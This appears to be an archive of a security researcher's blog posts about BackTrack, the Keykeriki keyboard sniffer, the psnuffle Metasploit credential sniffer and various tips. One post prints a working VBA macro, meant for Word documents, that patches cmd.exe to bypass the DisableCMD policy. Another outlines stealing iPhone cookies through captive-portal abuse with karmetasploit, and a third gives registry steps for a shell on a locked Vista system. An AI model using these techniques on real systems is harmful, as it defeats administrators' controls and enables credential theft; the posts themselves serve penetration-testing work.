Integrated blog into remote-exploit.org

Hey people, since backtrack is now not on remote-exploit.org anymore, i decided to blog straight into the news area on the website so please go to http://www.remote-exploit.org for new posts.

greetings

max

18$ Gigabit ExpressCard Ethernet Works in Mac

Wow, i am amazed. I just found the time to plug in the ExpressCard Ethernetadapter into my mac.

Tada... just works beautiful.. cool for just 18$ you cant go wrong.

http://www.dealextreme.com/details.dx/sku.16056

DisableCMD - History Repeating

Before I start. This is nothing new! Actually its known since many years (e.g. http://blog.didierstevens.com/2007/11/28/quickpost-disableamd-disableregistryfools/)

During a pentest i needed to patch cmd.exe to ignore the disablecmd policy setting. Nothing new, nothing special, but i needed to do it from remote and i had to use VBA/Word macros. Long story short, i decided to release the code, because its nothing special and the technique is well known.

Here is a short video about it:

VBA Macro to remove DisableCMD CMD.EXE restriction from Max Moser on Vimeo.

Short video showing my VBA byte patcher written to overcome DisableCMD policy setting. Sorry but i at least expected a fail safe behavior.

I am not any good in coding vba but it might save someone some time. I will add an example.doc on remote-exploit.org as well.

Sub patchcmd()
Dim Sourcefile As String, TargetFile As String, Windir As String, Tempdir As String
Dim F1 As Integer, F2 As Integer
Dim bytepattern(19) As Byte
Dim WshShell As Object

Set WshShell = CreateObject("WScript.Shell")
Windir = WshShell.ExpandEnvironmentStrings("%WinDir%")
Tempdir = WshShell.ExpandEnvironmentStrings("%temp%")

bytepattern(0) = &H44 'D
bytepattern(1) = &H0
bytepattern(2) = &H69 'i
bytepattern(3) = &H0
bytepattern(4) = &H73 's
bytepattern(5) = &H0
bytepattern(6) = &H61 'a
bytepattern(7) = &H0
bytepattern(8) = &H62 'b
bytepattern(9) = &H0
bytepattern(10) = &H6C 'l
bytepattern(11) = &H0
bytepattern(12) = &H65 'e
bytepattern(13) = &H0
bytepattern(14) = &H43 'C
bytepattern(15) = &H0
bytepattern(16) = &H4D 'M
bytepattern(17) = &H0
bytepattern(18) = &H44 'D

Dim fileoffset As Long
fileoffset = 0
Dim patternoffset As Long
patternoffset = 0
Dim gotbad As Boolean

gotbad = False

Sourcefile = Windir & "\system32\cmd.exe"
Destfile = Tempdir & "\dmc.exe"
  
Dim tmpbyte As Byte

    If Dir(Sourcefile) = "" Then Exit Sub
    FileCopy Sourcefile, Destfile
    F1 = FreeFile
    Open Sourcefile For Binary As F1
    
    F2 = FreeFile
    Open Destfile For Binary As F2
    
    While Not EOF(F1)
        gotbad = False
        
        Get #F1, , tmpbyte
        If tmpbyte = bytepattern(patternoffset) Then
            fileoffset = (Seek(F1) - 1)
            
            While (gotbad = False)
                Get #F1, , tmpbyte
                    patternoffset = patternoffset + 1
                    If tmpbyte = bytepattern(patternoffset) Then
                        If patternoffset > 18 Then
                            'Debug.Print "Found DisableCMD and position: " & fileoffset & "Patching it now"
                            Put #F2, fileoffset + 6, &H34
                            Close F1
                            Close F2
                            MsgBox "Yeah, run it from: " & Destfile, vbOKOnly, "CMD.EXE patched"
                            End
                        End If
                    Else
                        patternoffset = 0
                        gotbad = True
                    End If
            Wend
        End If
    Wend
    Close F1
    Close F2
End Sub

Psnuffle password sniffer for metasploit

I submitted a new version of the psnuffle credential sniffer addon to the metasploit team. Until HDM has reviewed it and merged it into the svn i uploaded a tgz to remote-exploit.org's code section http://www.remote-exploit.org/codes/psnuffle/psnuffle_rexploit_org_09082009.tar.gz Please note that it will be removed when its officially available within the metasploit svn. Checkout the demo video http://vimeo.com/6013518 if you like to see it in action. Currently i included pop3, imap, ftp and a HTTP Get sniffer module. Modules are very simple to code, so i expect new ones every few days.

Psnuffle credentials sniffing module demo from Max Moser on Vimeo.

With psnuffle metasploit got a credential sniffer in place. Its easy to use and extens. Writing a new module just takes some minutes.

Keykeriki on the new PCB's

Today i just finished my first Keykeriki hardware on the professionally manufactured PCB's. When everything works fine, we can go into mass-production :-). There where no major problems during soldering, except that the pre-drilled holes for the antenna connector are to small. Simple to solve: Either cut of the ground connectors and solder it directly onto it or file the legs/connectors to a smaller shape using a dremel.

iUsability-Pwned!

Lothar informed me about a strange behaviour of the iPhone running OS 3. It seems like the iPhone is automatically opening a browser when joining a network. (See video of the whole probleme here: http://www.vimeo.com/5466236)

The iPhone tries to do the following:

1. DNS querries for www.apple.com
2. Opening http://www.apple.com/library/test/success.html

When both are successful, then fine... the phone gets back "success" and everything is ok.
When both are failing... thats fine as well because then the phone assumes that the internet connection is not up and running.

BUT <-- isn't there always a BUT?!

If the phone can succcessfully querry the name but get back any different content than "Success"
it assumes that there is a captive portal which requires you to authenticate first to get access to the internet.

This is true for many hotspots etc... so Apple was thinking.. damn thats annoying for the user... lets open up
Safari automatically if this special case comes into place :-)

Usability kills security .... together with karmetasploit its a very evil thing. Get Iphones cookies, accounts and maybe even
system control... depending on the bugs you have left to test.

You can see the whole thing as a video @vimeo http://www.vimeo.com/5466236 .... now lets find some new safari bugs :-)



And thank you lothar for the fish.

Keykeriki faux-pas

What a shame, we released the software package yesterday and removed the schematics at the same time. Sorry for that, both tar.gz's are now back on the website. Btw we have about 80 TRF7900 receiver chips in stock if someone want to build a Keykeriki, just contact us using email.

greetz

max

Keykeriki vs. Logitech Round 1

Here is a picture of the information gathered using my Keykeriki and an oscilloscope. This image shows the sequence patterns needed to implement the parser for Logitech keyboards. Important side-note: Logitech uses standard miller symbols not the Microsoft variants.



If you dont know what Keykeriki is.. its an open-source, universal wireless keyboard sniffing project. Checkout

27Mhz Wireless Keyboard Sniffer Released

1.5 years after releasing our whitepaper "27Mhz Wireless Keyboard Analysis Report" about wireless keyboard insecurities, we are proud to present the universal wireless keyboard sniffer: Keykeriki. This opensource hardware and software project enables every person to verify the security level of their own keyboard transmissions, and/or demonstrate the sniffing attacks (for educational purpose only). The hardware itself is designed to be small and versatile, it can be extended to currently undetected/unknown keyboard traffic, and/or hardware extensions, for example, a repeating module or amplifier. Checkout http://www.remote-exploit.org/Keykeriki.html for further information, schematics and more. We will provide pcb's as soon they are ready.

greetings

max

OSX 10.5.6 Mail crash and recover

Well again we had a major security update on OSX. Guess what, yeah...apple mail terminates with segmentation fault during startup.

After researching and debugging around on my system i found out that GPGMail Bundle plugin was the Problem. Uninstall that Bundle from your $HOME/Library/Mail/Bundles directory.

Day saved...gpg back to console and over and out.

max

Locked yourself out of Vista?

During some computer hardening work i managed to lock myself out of the system completely. Unfortunately it is a standalone system, so no re-apply domain gpo was possible. Also the restrictive firewall settings and sharing configuaration did not allow me to use any of the leet tricks like psexe, remote registry etc.

Because i still had physical access to the system i tried to delete the .pol file on the system at c:\Windows\System32\GroupPolicyUsers\

So i still was locked out and was trying every trick i know...until i came up to this one:

1) Download the chntpw iso at http://home.eunet.no/pnordahl/ntpasswd/bootdisk.html
2) Boot system with that one and use the registry editor to go to the SYSTEM hive
2) Cd into the Setup key
3) Edit the CmdLine value to cmd.exe
4) Edit the SetupType value to 2
5) Reboot and you will get a dosbox
6) Start mmc or gpoedit.msc
7) type Exit.

Coooool....

thanks to the original idea poster over here: http://forums.techarena.in/windows-security/678964.htm

Over 150'000 downloads in about a week

Well I think it is amazing how far this Backtrack Project is gone. We already have over 150'000 Downloads since we released the version 3 at June 19th. This does not include any unofficial mirrors and/or torrents that are available. Roughly this translates in over 100Terrabyte of Data transmitted in ONE WEEK! When i see this number i would wish that i get only 1$ for every download :-)

Anyway i am impressed again and again by those numbers. Since years we keep the lines hot and the community able to test these great tools within an easy environment without the need of an installation. See you soon.

Even my mailbox praises me :-)

Lately when i was checking my mail, i recognize a funny thing. Checkout the number of Messages :-) I must be real hacker then when even my mailbox praises me as 1337 :-)

See you later..same blog..different content

Backtrack 3 released today

I am proud to announce that we have released backtrack yesterday at the
interview with pauldotcom.

Muts, Martin and I have slaved for weeks and months, together with the
help of many remote-exploit'ers to bring you this fine release. As
usual, this version overshadows the previous ones with extra cool
things.

Nessus

Unfortunately, Tenable would not allow for redistribution of Nessus.

Saint
Fortunately, SAINT *has* provided BackTrack users with a functional
version of SAINT, pending a free request for an IP range license
through the SAINT website, valid for 1 year.

Maltego
The guys over at Paterva have created a special version of Maltego
v2.0 with a community license especially for BackTrack users. We would
like to thank Paterva for co-operating with us and allowing us to
feature this amazing tool in BackTrack.

Kernel
2.6.21.5. Yes, yes, stop whining....We had serious deliberations
concerning the BT3 kernel. We decided not to upgrade to a newer kernel
as wireless injection patches were not fully tested and verified. We
did not want to jeopardize the awesome wireless capabilities of BT3
for the sake of sexiness or slightly increased hardware
compatibilities. All relevant security patches have been applied.

Tools
As usual, updated, sharpened, SVN'ed and armed to the teeth. This
release we have some special features such as spoonwep, fastrack and
other cool additions.

Availability
For the first time we distribute three different version of Backtrack 3
- CD Version
- USB Version with Compiz
- VMWare version including the VMWTools and some special Addons

Final Requests
We request the community to not mirror or torrent this release, or
otherwise distribute it online without our knowledge. We are trying to
gather precise statistics about bt3 downloads. If you would like to
mirror BT3 then please:

1) Think again! Traffic generated by BT3 downloads is CRAZY.
2) Please contact us before doing so.
3) Send us monthly statistics of downloads for the iso.

Rants

Problems, fixes, bugs, opinions - should all end up in our Remote
Exploit community forums, and our wiki:

http://forums.remote-exploit.org
http://wiki.remote-exploit.org

Over and out,

Max, Muts, Martin